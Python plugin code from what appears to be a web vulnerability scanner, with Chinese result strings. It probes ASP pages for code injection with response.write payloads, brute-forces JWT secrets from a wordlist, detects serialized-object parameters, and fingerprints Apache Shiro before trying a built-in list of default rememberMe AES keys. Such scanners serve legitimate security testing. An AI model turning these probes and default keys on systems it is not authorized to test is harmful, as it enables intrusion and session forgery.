def audit(self):
    """Probe for classic-ASP code injection using an arithmetic ``response.write`` marker.

    The check is skipped unless the fingerprint says ASP or the scan runs at
    ``conf.level`` >= 2.  Three payload shapes are generated per injection point:
    the bare expression, a single-quote break-out and a double-quote break-out.
    A hit is declared when the product of two random five-digit factors (a 9-10
    digit number, unlikely to occur in a page by accident) is echoed in the
    response body -- only a server that evaluated the expression can produce it.

    Returns True on the first confirmed hit, None otherwise.
    """
    if WEB_PLATFORM.ASP not in self.response.programing and conf.level < 2:
        return
    lhs = random.randint(10000, 90000)
    rhs = random.randint(10000, 90000)
    marker = str(lhs * rhs)
    expr = "response.write({}*{})".format(lhs, rhs)
    probes = [expr, "'+" + expr + "+'", '"' + expr + '+"']
    # Every injection position is combined with every probe; stop at the first echo.
    for origin_dict, place in self.generateItemdatas():
        for key, value, new_value, payload in self.paramsCombination(origin_dict, place, probes):
            resp = self.req(place, payload)
            if not resp or marker not in resp.text:
                continue
            result = ResultObject(self)
            result.init_info(self.requests.url, "发现asp代码注入", VulType.CMD_INNJECTION)
            result.add_detail("payload探测", resp.reqinfo, generateResponse(resp),
                              "探测payload:{},并发现回显数字{}".format(new_value, marker),
                              key, payload, place)
            self.success(result)
            return True
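def fuzz_secret(self, contents, sig, headDict, v):
    """Brute-force the HMAC secret of a JWT against the bundled ``jwt_secret.txt`` wordlist.

    Args:
        contents: the signed portion of the token handed to ``testKey``.
        sig: the token's signature segment handed to ``testKey``.
        headDict: the decoded JOSE header -- presumably used by ``testKey`` to pick the
            algorithm; confirm against its definition.
        v: the raw token, echoed in the finding text.

    A verified candidate is reported as a SENSITIVE finding and the search stops,
    since one recovered key already lets an attacker forge arbitrary tokens.

    Fixes: the original iterated an ``open()`` handle without closing it; the
    wordlist is now read under ``with`` so the descriptor is released even if
    ``testKey`` raises.
    """
    wordlist = os.path.join(path.data, "jwt_secret.txt")
    with open(wordlist, encoding="utf-8") as fh:
        # Strip only the line terminator: surrounding spaces may be part of a secret,
        # and an empty line is a legitimate candidate (empty HMAC key).
        candidates = [line.rstrip("\n") for line in fh]
    for secret in candidates:
        if not testKey(secret.encode(), sig, contents, headDict):
            continue
        text_result = "猜解出jwt:{}的secret为:{}, ".format(v, secret)
        result = ResultObject(self)
        result.init_info(self.requests.url, text_result, VulType.SENSITIVE)
        result.add_detail("猜解jwt的secret", "", "", text_result, "", "", "")
        self.success(result)
        return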
def _check(self, k, v):
    """Flag a request parameter whose value looks like a serialized object blob.

    The Java, PHP and Python detectors are tried in that order on ``v``; on the
    first match a BASELINE finding is recorded naming parameter ``k`` and the
    detected format.  This is detection only -- nothing is deserialized here --
    so the finding is a lead for manual follow-up, not a confirmed vulnerability.
    """
    detectors = (
        (isJavaObjectDeserialization, "JavaObjectDeserialization"),
        (isPHPObjectDeserialization, "PHPObjectDeserialization"),
        (isPythonObjectDeserialization, "PythonObjectDeserialization"),
    )
    # Short-circuits like the original if/elif chain: later detectors are not run.
    whats = next((label for probe, label in detectors if probe(v)), None)
    if whats is None:
        return
    result = ResultObject(self)
    result.init_info(self.requests.url, "发现{}反序列化参数".format(whats), VulType.BASELINE)
    result.add_detail("原始请求", self.requests.raw, self.response.raw,
                      "参数{}发现为{}的反序列化结果".format(k, whats),
                      k, v, self.requests.method)
    self.success(result)
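def _check_key(self, keys=None):
    """Try well-known default Shiro ``rememberMe`` AES keys against the target.

    Args:
        keys: optional iterable of base64 AES keys to try; defaults to the
            built-in list of keys shipped by common Shiro-based products.

    For each key a ``rememberMe`` cookie is built by ``self.generator_payload`` and
    the original request is replayed with it.  Shiro answers a cookie it cannot
    decrypt with ``rememberMe=deleteMe`` in ``Set-Cookie``; a response *without*
    that marker is taken to mean the key was accepted, i.e. the server will
    deserialize attacker-controlled data (reported as CMD_INNJECTION).

    Returns True on the first accepted key, False if none matched.

    Fixes: the original assigned ``reqHeader = self.requests.headers`` and then
    wrote the probe cookie into it, mutating the shared request headers for every
    later key and every later plugin.  The headers are now copied per attempt.
    """
    if keys is None:
        keys = [
            'kPH+bIxk5D2deZiIxcaaaA==',
            '4AvVhmFLUs0KTA3Kprsdag==',
            'WkhBTkdYSUFPSEVJX0NBVA==',
            'RVZBTk5JR0hUTFlfV0FPVQ==',
            'U3ByaW5nQmxhZGUAAAAAAA==',
            'cGljYXMAAAAAAAAAAAAAAA==',
            'd2ViUmVtZW1iZXJNZUtleQ==',
            'fsHspZw/92PrS3XrPW+vxw==',
            'sHdIjUN6tzhl8xZMG3ULCQ==',
            'WuB+y2gcHRnY2Lg9+Aqmqg==',
            'ertVhmFLUs0KTA3Kprsdag==',
            '2itfW92XazYRi5ltW0M2yA==',
            '6ZmI6I2j3Y+R1aSn5BOlAA==',
            'f/SY5TIve5WWzT4aQlABJA==',
            'Jt3C93kMR9D5e8QzwfsiMw==',
            'aU1pcmFjbGVpTWlyYWNsZQ==',
        ]
    for key in keys:
        payload = self.generator_payload(key)
        # .copy() keeps a case-insensitive header mapping case-insensitive (dict()
        # would not); the shared self.requests.headers is never written.
        headers = self.requests.headers.copy()
        cookie_dict = paramToDict(headers.get("Cookie", ""), place=PLACE.COOKIE)
        cookie_dict["rememberMe"] = payload
        headers["Cookie"] = url_dict2str(cookie_dict, PLACE.COOKIE)
        # NOTE(review): no timeout is passed; a hanging target stalls the scan.
        resp = None
        if self.requests.method == HTTPMETHOD.GET:
            resp = requests.get(self.requests.url, headers=headers)
        elif self.requests.method == HTTPMETHOD.POST:
            resp = requests.post(self.requests.url, data=self.requests.post_data, headers=headers)
        # Truthiness kept from the original: a requests Response is falsy on an
        # error status, so 4xx/5xx answers are skipped as well as a missing one.
        if not resp or "deleteMe" in resp.headers.get("Set-Cookie", ""):
            continue
        result = ResultObject(self)
        result.init_info(self.requests.url, "Shiro Key发现", VulType.CMD_INNJECTION)
        result.add_detail("payload探测", resp.reqinfo, generateResponse(resp),
                          "Cookie中rememberMe可以被反序列化", "rememberMe", payload, PLACE.COOKIE)
        self.success(result)
        return True
    return False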
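def audit(self):
    """Fingerprint Apache Shiro and, if present, hand off to the default-key check.

    Detection, in order:
      1. The original response already carries ``deleteMe`` in ``Set-Cookie`` ->
         Shiro confirmed, BASELINE finding.
      2. Otherwise -- unless the platform is not Java and ``conf.level`` < 2 -- the
         request is replayed with a junk ``rememberMe=2`` cookie; Shiro rejects an
         undecryptable cookie with the same ``deleteMe`` marker -> BASELINE finding.
    When either criterion holds ``self._check_key()`` tries the well-known AES keys.

    Fixes: the probe used to write its cookie straight into ``self.requests.headers``,
    polluting the shared request for later plugins; it now works on a copy.  The
    finding text also claimed ``rememberMe=1`` while the code sends ``2``.
    """
    is_shiro = "deleteMe" in self.response.headers.get("Set-Cookie", "")
    if is_shiro:
        result = ResultObject(self)
        result.init_info(self.requests.url, "Shiro框架发现", VulType.BASELINE)
        result.add_detail("payload探测", self.requests.raw, self.response.raw,
                          "在返回的cookie中发现了deleteMe标记", "", "", PLACE.GET)
        self.success(result)
    if WEB_PLATFORM.JAVA not in self.response.programing and conf.level < 2 and not is_shiro:
        return
    if not is_shiro:
        # Not fingerprinted yet: provoke the rememberMe handler with a bogus cookie.
        # .copy() keeps a case-insensitive header mapping case-insensitive.
        headers = self.requests.headers.copy()
        cookie_dict = paramToDict(headers.get("Cookie", ""), place=PLACE.COOKIE)
        cookie_dict["rememberMe"] = "2"
        headers["Cookie"] = url_dict2str(cookie_dict, PLACE.COOKIE)
        # NOTE(review): no timeout is passed; a hanging target stalls the scan.
        resp = None
        if self.requests.method == HTTPMETHOD.GET:
            resp = requests.get(self.requests.url, headers=headers)
        elif self.requests.method == HTTPMETHOD.POST:
            resp = requests.post(self.requests.url, data=self.requests.post_data, headers=headers)
        # Truthiness kept from the original: a requests Response is falsy on an
        # error status, so 4xx/5xx answers are ignored here.
        if resp and "deleteMe" in resp.headers.get("Set-Cookie", ""):
            is_shiro = True
            result = ResultObject(self)
            result.init_info(self.requests.url, "Shiro框架发现", VulType.BASELINE)
            result.add_detail("payload探测", resp.reqinfo, generateResponse(resp),
                              "在cookie中加入rememberMe=2,在返回cookie发现了deleteMe标记,可尝试爆破shiro的key",
                              "", "", PLACE.GET)
            self.success(result)
    if is_shiro:
        self._check_key()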